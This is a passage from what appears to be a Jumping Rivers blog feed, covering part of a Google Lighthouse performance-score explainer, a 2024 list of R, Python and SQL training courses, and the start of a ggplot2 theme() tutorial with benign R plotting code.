&lt;p&gt;Performance scores lie in a range between 0 (worst) and 100 (best).&lt;/p&gt;
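&lt;p&gt;To make the weighting concrete, here is a rough sketch of the arithmetic. It assumes each metric has already been converted to its own 0 to 100 score (Lighthouse does this conversion from the raw timings itself), and the function name &lt;code&gt;performance_score&lt;/code&gt; and the example values are purely illustrative:&lt;/p&gt;

```shell
# performance_score: weighted sum of five metric scores (each 0-100),
# given in the order FCP, SI, LCP, TBT, CLS, using the weights listed above.
performance_score() {
  awk -v fcp="$1" -v si="$2" -v lcp="$3" -v tbt="$4" -v cls="$5" 'BEGIN {
    printf "%.1f\n", 0.10 * fcp + 0.10 * si + 0.25 * lcp + 0.30 * tbt + 0.25 * cls
  }'
}

# Hypothetical metric scores for one app.
performance_score 90 80 70 60 100
```

&lt;p&gt;With these made-up values the result is 9 + 8 + 17.5 + 18 + 25 = 77.5, which shows how a weak Total Blocking Time score drags the overall score down more than a weak Speed Index would.&lt;/p&gt;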
&lt;h3 id="lighthouse-performance-suggestions"&gt;Lighthouse Performance Suggestions&lt;/h3&gt;
&lt;p&gt;Another cool feature of Google Lighthouse is the performance improvement suggestions. I am going to use the &lt;a href="https://www.surfline.com/" rel="external"&gt;Surfline website&lt;/a&gt; as an example for this section. These suggestions can be found underneath the performance score on the report and should look similar to the image below.&lt;/p&gt;
&lt;img src="images/surfline.png" alt="A report page as in the above images is shown, this time for a different webpage. The scores here are as follows: 74, 81, 83, 100. Below is a section called Opportunities, which lists ways in which the score can be improved, and estimated loading time savings." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Each suggestion can be expanded for more information, and is shown alongside the estimated time savings from implementing it. These suggestions can be helpful if you want to improve a particular aspect of your website or just generally streamline it.&lt;/p&gt;
&lt;p&gt;This was an overview of Google Lighthouse covering the many ways to run reports on web pages and some guidelines for interpreting Lighthouse reports. We can also use it to analyse Shiny applications, which will be covered in the next installment of this blog series.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training Lineup for 2024: January-June</title><link>https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/</link><pubDate>Tue, 28 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;All of our public training courses for the first half of 2024 are now open for registration! Head over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public courses page&lt;/a&gt; on our website to book in and start building your programming skills in the new year! Below is a list of all of our upcoming courses with a description, upcoming dates, course level and a link to the page to find out more!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-training-lineup-for-2024"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;h4 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th January 2024 &amp;amp; 22nd April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd January 2024 &amp;amp; 29th April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;This course&lt;/a&gt; will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h4 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 29th January 2024 &amp;amp; 20th May 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 12th February 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad practices. In &lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;this course&lt;/a&gt; we motivate the importance of good practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 5th February 2024 &amp;amp; 10th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;This course&lt;/a&gt; will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2024 &amp;amp; 3rd June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypothesis tests, before moving on to ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;img src="r-lecture.jpg" alt="CUSP London logo" style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="machine-learning"&gt;Machine Learning&lt;/h3&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2024 &amp;amp; 17th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. We will be &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;specifically focusing on&lt;/a&gt; how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2024 &amp;amp; 24th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This course builds on the material covered in our Machine Learning with Tidymodels course. We take a look at fitting linear discriminant analysis (LDA) models using {discrim}, assessing model reliability using V-fold cross validation, pre-processing, tree-based models &amp;amp; more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;this course&lt;/a&gt; is certainly for you!&lt;/p&gt;
&lt;img src="full-image.jpg" alt="CUSP London logo" style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="automatic-reporting"&gt;Automatic Reporting&lt;/h3&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 25th March 2024 &amp;amp; 24th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;this course&lt;/a&gt; is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;img src="reporting.jpg" alt="CUSP London logo" style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="statistics"&gt;Statistics&lt;/h3&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th January 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences. &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;This course&lt;/a&gt; will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;img src="normal-curve.jpg" alt="CUSP London logo" style="width: 600px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2024 &amp;amp; 13th May 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2024 &amp;amp; 3rd June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2024 &amp;amp; 17th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;This course&lt;/a&gt; will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving onto complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;img src="informal-python.jpg" alt="CUSP London logo" style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="sql"&gt;SQL&lt;/h3&gt;
&lt;h4 id="introduction-to-sql"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;Introduction to SQL&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 14th February 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Structured Query Language (SQL) defines a standard for communicating with a relational database. In &lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn the basic SQL syntax for data extraction, filtering and insertion. We will start by querying a local database before connecting to a remote database held on an AWS server. Here, we will stress important considerations when working with shared databases in the cloud.&lt;/p&gt;
&lt;h4 id="an-introduction-to-sql-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;An Introduction to SQL with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. The main focus of &lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;this training course&lt;/a&gt; is to introduce SQL databases, write your first SQL queries, and show how R can be used to retrieve and manipulate data stored in a relational database. The course uses both the {DBI} and {dbplyr} packages.&lt;/p&gt;
&lt;p&gt;We use the &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example for public courses. For in-house training, we are happy to adapt the course to match your database requirements.&lt;/p&gt;
&lt;h4 id="introduction-to-sql-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;Introduction to SQL with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. &lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;This training course&lt;/a&gt; introduces SQL databases and the SQL command syntax, and shows how Python can be used to retrieve and manipulate data held in a relational database. The course also discusses how SQLAlchemy can be used to define and interact with databases using object-oriented Python code.&lt;/p&gt;
&lt;p&gt;We use a &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example, and communicate with this using a psycopg2 connection.&lt;/p&gt;
&lt;h3 id="so-what-now"&gt;So what now?&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re interested in attending any of our public courses, then you can head straight over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public booking page&lt;/a&gt;! If you&amp;rsquo;re looking for training for your team, or maybe even something a bit more bespoke, then &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt; and we&amp;rsquo;ll see what we can do! All of our training courses can be found in our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course catalogue&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Getting started with theme()</title><link>https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/</link><pubDate>Thu, 23 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;theme()&lt;/code&gt; function in {ggplot2} is awesome. Although it’s only one function, it gives you so much control over your final plot. &lt;code&gt;theme()&lt;/code&gt; allows us to generate a consistent, in-house style for our graphics, modify the text within our plots and more. Getting comfortable with &lt;code&gt;theme()&lt;/code&gt; will really take your {ggplot2} skills up a notch.&lt;/p&gt;
&lt;p&gt;Normally, when people want help with an R function I tell them to use the built-in documentation about the function. This is normally done by typing &lt;code&gt;?function_name&lt;/code&gt; into the console. It’s usually pretty informative and often enough to help people understand a new function.&lt;/p&gt;
&lt;p&gt;So let’s try this with &lt;code&gt;theme()&lt;/code&gt; …&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;theme
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You probably feel a bit like this now:&lt;/p&gt;
&lt;img src="graphics/overflowing_cupboard.gif" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes) but grid lines have been removed, so that the points on the scatter plot are on a plain, white background." style="width: 60%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;If you&amp;rsquo;re coding along with me you&amp;rsquo;ll be able to see there are loads of arguments to &lt;code&gt;theme()&lt;/code&gt;. If you&amp;rsquo;re patient and like counting, you&amp;rsquo;ll find that there are &lt;em&gt;ninety-nine&lt;/em&gt; arguments to the &lt;code&gt;theme()&lt;/code&gt; function.&lt;/p&gt;
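&lt;p&gt;If you&amp;rsquo;d rather not count by hand, a quick sketch like the one below asks R for the argument names directly. The total includes housekeeping arguments such as &lt;code&gt;...&lt;/code&gt;, &lt;code&gt;complete&lt;/code&gt; and &lt;code&gt;validate&lt;/code&gt;, and it depends on which version of {ggplot2} you have installed, so treat the number above as a snapshot rather than a constant.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# formals() returns the argument list of a function
theme_args = names(formals(theme))

length(theme_args) # how many arguments theme() has in your version
head(theme_args) # the first few argument names
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;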
&lt;p&gt;Do you need to know all of these arguments? &lt;em&gt;No.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do I know all of these arguments? &lt;em&gt;Also no&lt;/em&gt;.&lt;/p&gt;
&lt;h3 id="what-to-we-want-to-achieve"&gt;What to we want to achieve?&lt;/h3&gt;
&lt;p&gt;By the end of this blog post, you are going to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;become familiar with a handful of &lt;code&gt;theme()&lt;/code&gt; arguments&lt;/li&gt;
&lt;li&gt;be able to understand how to modify theme elements&lt;/li&gt;
&lt;li&gt;have built the confidence to try modifying aspects of a theme on your own&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What I&amp;rsquo;m not aiming to do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;construct the world&amp;rsquo;s most elegant {ggplot2} theme&lt;/li&gt;
&lt;li&gt;show you every single thing that can be modified via &lt;code&gt;theme()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Basically, I want to give you the tools to make your plots look the way you want them to.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also worth mentioning that this post is peppered with personal opinion; I want you to absorb how I&amp;rsquo;ve managed to implement my stylistic choices, not take these choices as the &amp;ldquo;truth&amp;rdquo;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-theme-command"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="building-a-basic-plot"&gt;Building a basic plot&lt;/h3&gt;
&lt;p&gt;In order to modify a plot theme, we&amp;rsquo;re going to need a plot to start with. We&amp;rsquo;re going to work with a simple scatter plot derived from the Palmer Penguins data set. The data are freely available via the {palmerpenguins} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;RColorBrewer&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# pkg for nice colours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; palmerpenguins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;penguins
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;brewer.pal&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Set2&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# pick some nice colours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# remove missing values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; body_mass_g, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bill_length_mm, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; palette) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Do heavier penguins have longer bills?&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Species&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Body mass (g)&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Bill length (mm)&amp;#34;&lt;/span&gt;)
